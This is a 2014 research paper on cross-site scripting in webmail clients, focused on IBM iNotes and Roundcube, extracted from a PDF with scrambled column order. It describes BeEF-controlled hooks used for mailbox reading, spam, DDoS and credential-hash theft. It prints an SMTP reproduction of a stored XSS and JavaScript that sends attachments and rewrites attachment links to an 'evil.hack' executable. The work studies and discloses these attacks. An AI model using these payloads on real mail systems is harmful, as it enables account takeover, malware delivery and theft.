The email that is watching you Bart Leppens and Anthony Piron December 19, 2014 Abstract Cross-site Scripting (XSS) is probably the most common security vulnerability exisiting in web applications at large. Nevertheless, the impact of Cross-site Scripting is still seriously underestimated by many people and even major companies. The CVE-scores given for Cross-site Scripting issues are on the average pretty low, but on the opposite side an adversary does not care. Cross-site Scripting vulnerabilities will make his dreams come true. The impact of Cross-site Scripting in webmail applications does not differ from those in regular web applications, however, the mail-infrastructure is a top-notch target for a Cross-site Scripting-attack. Keywords: Cross-site Scripting, webmail, attack 1 Contents 1 The Web is a mess 1 2 The anecdotal Cross-site Scripting 2.1 Cross-site Scripting in Webmail clients . 2.1.1 Reflected Cross-site Scripting in roundcube . . . . . . . . . . 2.1.2 Stored Cross-site Scripting in Lotus iNotes . . . . . . . . . . 2.1.3 Universal Cross-site Scripting and Webmail . . . . . . . . . . 2.2 Injecting a JavaScript hook . . . . . . . 2.3 BeEF: the Command & Control server . 1 2 3 4 A myth: there ain’t no such thing 3.1 Targeted mailbox attack . . . . . 3.2 Worm nesting and replication . . 3.3 DDoSing . . . . . . . . . . . . 3.4 Mass mailing . . . . . . . . . . 3.4.1 DDoS of a mailbox . . . 3.4.2 Send spam . . . . . . . 3.5 Download infection . . . . . . . 3.6 Being at someone’s beck and call Conclusion Bibliography . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . The Web is a mess The Internet was done so well that most people think of it as a natural resource like the Pacific Ocean, rather than something that was man-made. When was the last time a technology with a scale like that was so error-free? The Web, in comparison, is a joke. The Web was done by amateurs 2 2 Alan Kay 2 2 2 Building a secure website is hard, very hard. So many things may go wrong. Even renowned experts have hard times to be successful. The Web is unnecessarily extremely complex. How many different concepts? How many flawed designs? How many dangerous features? How many half-baked mitigations? The most innocent looking vulnerability is a ticking disaster: a time-bomb on every single website. The question is not about “how” or “what” but “when”. 3 3 3 3 3 3 3 4 4 2 5 The anecdotal Cross-site Scripting The web browser is the operating system of a web application. A Cross-site Scripting vulnerability is no more than a remote distributed arbitrary code execution. New 5 1 2.1.3 name for an old concept, what may go wrong? Let’s imagine an attacker could execute some arbitrary lines of code in the security context of your favorite webmail. This is not a frivolous dream, there are multiple CVEIDs related to Cross-site Scripting in webmail. Crosssite Scripting is everywhere but sometimes hard to spot and/or to prevent. 2.1 Universal Cross-site Scripting and Webmail When your browser or an add-on has a Universal Crosssite Scripting bug, an attacker may be able to execute scripts in the context of every origin. This may also be the case when the user has installed a malicious browser add-on. It is obvious that an attacker can attack even cloud-based webmail services like e.g. Hotmail, GMail, ... that have no known public Cross-site Scripting issues. Cross-site Scripting in Webmail clients It is clear that there are multiple ways to achieve Crosssite Scripting in webmail. Here are some examples: 2.2 Injecting a JavaScript hook Instead of just displaying alert(1) or the document’s cookies to the user, the attacker can inject a JavaScript 2.1.1 Reflected Cross-site Scripting in roundcube hook as well. For it to be more effective we can append CVE-2011-2937 [3], a reflected Cross-site Scripting our script-tag to top.window.document. In that way, we vulnerability in the UI message functionality of Round- don’t lose our hook when, for example, the victim opens cube Webmail before 0.5.4 found by Abyszko. Ac- another mail in his iNotes-client. cording to the description of the bug [12] in the bug Stored Cross-site Scripting in Lotus iNotes CVE-2014-0913 [4], a stored Cross-site Scripting vulnerability in IBM iNotes and Domino 8.5.3 FP6 before IF2 and 9.0.1 before FP1 allows remote attackers to inject arbitrary web script or HTML via an e-mail message. The following code allows to reproduce the bug: Once the hook is running on the infected browser, the JavaScript hook can poll a given Command and Control Server (C&C Server) to check if there are commands that need to be executed within the security context of the currently hooked page. Multiple victims can be simultaneously hooked and each victim is known by a unique identifier. This ID needs to be different with every hook sent to each victim. telnet iNotesSMTPserver 25 HELO xss MAIL FROM: RCPT TO: DATA MIME-Version: 1.0 FROM: ATTACKER TO: VICTIM Subject: iNotes XSS vulnerable mail Content-Type: text/html 2.3 BeEF: the Command & Control server Once the JavaScript hook is injected in the webmail client, an attack can control the webmail by a C&C Server. Penetration testers will probably be familiar with BeEF: The Browser Exploitation Framework [2] (The Browser Exploitation Framework) C&C Server. We added several modules for BeEF that can exploit webmail-clients. . CVE score for this bug is 4.3 out of 10. 2 given his unid. The third module, Send iNotes [13], allows to send a note from a hooked browser. +-----------------+ | Attacker | +-----------------+ | | V +---------------------+ | BeEF C&C | | Server | +---------------------+ ^ ^ ^ | | poll | | | | +----------+ | +----------+ | | Infected |-+ | Infected | +-... | Webmail | | Webmail | +----------+ +----------+ 3.2 Worm nesting and replication In 2007, Rosario Valotta already demonstrated the huge impact of Cross-site Scripting in webmail. He create the Nduja worm [10], a cross domain webworm that was able to propagate itselfs across 4 Italian webmail services. The worm is named after a spicy pork sausage Nduja from Calabria Italy. 3.3 DDoSing All zombies that are hooked to the BeEF C&C Server can take part in a DDoS attack. For this there is no need All the zombies that are infected with JavaScript to control the origin of the webmail. Interesting thing hook will obey the C&C Server. Here we are interested here is that when the victim is behind a corporate firein zombies hooked (infected) within the origin of the wall, the attacker can use the webbrowser as a pivot and webmail. start to DDoS internal servers as well. Every newly inFor exploiting IBM iNotes we have added several fected zombie can take part in a DDoS attack. This can modules to the BeEF-project. If you are able to control easily be automatically automated be executed with the the origin, you can extract a list of notes, read the details DOSer-module [5] written by Michele Orru’ which is of a note and even send a note. available in BeEF. 3 A myth: there ain’t no such thing 3.4 Mass mailing So, we control the origin. Just to show how bad this may be, we provide you with some potential attack scenarios in the following paragraphs. As an additional reference we suggest the reader to have a look at The Browser Hacker’s Handbook [1]. The book contains in-depth analyses and multiple real-life examples of how things can go wrong when the origin is controlled, as well as attacks that work cross-origin. 3.1 3.4.1 DDoS of a mailbox When the BeEF zombies are hooked within the origin of the webmail, all these zombies can be used to flood the mailbox of someone. When the attack is performed with a sufficient amount of zombies at a decent sending rate, this will result in a denial of service of that users mailbox or even a denial of service of the whole mailserver. This can be done with the iNotes Flooder-module [7] which is available in BeEF. Targeted mailbox attack When an attacker targets his victim, he can perform actions on behalf of his victim. With Cross-site Scripting an attacker can send a mail in the name of the victim to another victim. The principle of confidentiality will be broken as well since the attacker can access all messages in the victims mailbox and see all of the victim’s contacts. To achieve this with iNotes, there are 3 modules available in the BeEF (The Browser Exploitation Framework). The first module, Extract iNotes list [6], returns a list of unid’s from all the notes. A second module, Read iNotes [11], allows to read the details of a note 3.4.2 Send spam An attacker can use the hooked zombies to send spam on behalf of the victim’s mailbox. This can potentially bypass anti-spam filters since the victim will probably have a good reputation. The attacker can also extract a list of contacts from his victim’s mailbox and then send a spam message from the victims mailbox to each of his contacts. If that contact has great confidence in the victim, this can lead towards a more succesfull spamming campaign. 3 3.5 Download infection xhr.sendAsBinary(post_data); When a contact receives a mail from an attacker sent by Cross-site scripting from a victim’s mailbox, thisperson may have great confidence in the attachments that are sent with such a malicious mail. This gives an attacker an easy way to infect a contact’s computer with a malicious executable. The following code can be used to send an e-mail with an attachment: Sending an email with attachment can also be easily done with the Send iNotes with attachment-module [14] which is available in BeEF. A second possibility is to substitute the url of the link or to overload the onClick event with JavaScript in order to serve another malicious file on a victim’s click. The substitution may be done with the following trivial code: var to = ""; var subject = "mail with attachment"; var body = "Hello,\r\nDear reader of this mail with attachment!" var filename = "filename.bin"; var filedata = "\xDE\x76\x77\x66"; top.window.frames["s_MainFrame"]. document.getElementsByClassName("s -attachments-text")[0]. getElementsByTagName("a")[0].href= "http://evil.hack/some.exe"; Or substitue the link for all the attachments: [...snip...] [][" s_MainFrame"].document. getElementsByClassName("sattachments-text")[0]. getElementsByTagName("a"), function (a) { a.href="http://evil .hack/some.exe" }); var xhr = new XMLHttpRequest(); //the URI to send the request to var uri = notesURL + "/($Inbox)/$new/? EditDocument&Form=h_PageUI& PresetFields=h_EditAction; h_ShimmerEdit,s_ViewName;($Inbox), s_NotesForm;Memo&ui=dwa_form"; //Initializes a request"POST", uri, true); 3.6 //Make the invocation with Cookies xhr.withCredentials = true; Being at someone’s beck and call For now we have discussed a few attack vectors but there are many many more. The limitation lies in the creativity and skills of the attacker. For example, IBM iNotes has a database named names.nsf [9]. This database includes all mail addresses, users’ information, users’ operating systems, and other juicy information. This file contains the hashes of all users’ credentials. These hashes can be cracked with John The Ripper [8]. The names.nsf file is often available to an anonynomous user and since we run in the same origin, we can recuperate its contents through Cross-site Scripting with AJAX. If ACL’s are put in place to limit the access to the file it’s often a matter of hooking the client of a Notesadministrator to have access to the database. Some other possible scenario is the following: when the webclient is infected with Cross-site Scripting, it is possible for an attacker to send a copy, not necessarily by mail but for example by cross-origin XHR, with the content of each email sent. A last example would be that Cross-site Scripting could be used to search in the victim’s mail for stored credentials. xhr.setRequestHeader("Content-Type", " multipart/form-data; boundary=" + boundary); var post_data = boundary + "\r\n"; post_data += "Content-Disposition: form-data; [...snip...] post_data += "Content-Disposition: form-data; name=\" HaikuUploadAttachment0\"; filename=\"" + filename + "\"\r\n" ; post_data += "\r\n"; post_data += filedata + "\r\n"; post_data += boundary + "--"; //Send the request as binary data 4 4 Conclusion When your webmail is infected with Cross-site Scripting, attack-scenarios are nearly endless. It is clear that Cross-site Scripting in webmail and even Cross-site Scripting in general is a serious problem. This security problem is not well understood, not even by major vendors. References [1] W. Alcorn, C. Frichot, and M. Orru. The Browser Hacker’s Handbook. Wiley, 2014. ISBN: 9781118662090. [2] BeEF: The Browser Exploitation Framework. URL: [3] CVE-2011-2937. URL: http : / / web . nvd . nist . gov / view / vuln / detail ? vulnId=CVE-2011-2937. [4] DOSer. URL: https : / / github . com / beefproject / beef / tree / master / modules/network/DOSer. [6] Extract iNotes list. URL: https://github. com / beefproject / beef / tree / master/modules/misc/ibm\_inotes/ extract\_inotes\_list. iNotes Flooder. URL: https : / / github . com / beefproject / beef / tree / master/modules/misc/ibm\_inotes/ inotes\_flooder. [8] John The Ripper. URL: http : / / www . [9] names.nsf. URL: http : / / www - 01 . ibm . com / support / docview . wss ? uid = swg21212934. [10] Nduja. URL: http : / / ha . ckers . org / blog / 20070709 / nduja - cross domainwebmail-xss-worm/. [11] Read iNotes. URL: beefproject / beef / tree / master / modules / misc / ibm \ _inotes / read \ _inotes. [12] roundcube bugtracker. URL: http : / / trac . CVE-2014-0913. URL: http : / / web . nvd . nist . gov / view / vuln / detail ? vulnId=CVE-2014-0913. [5] [7] [13] Send iNotes. URL: beefproject / beef / tree / master / modules / misc / ibm \ _inotes / send \ _inotes. [14] Send iNotes with attachment. URL: https : / / github . com / beefproject / beef / tree / master / modules / misc / ibm \ _inotes / send \ _inotes \ _with \ _attachment. 5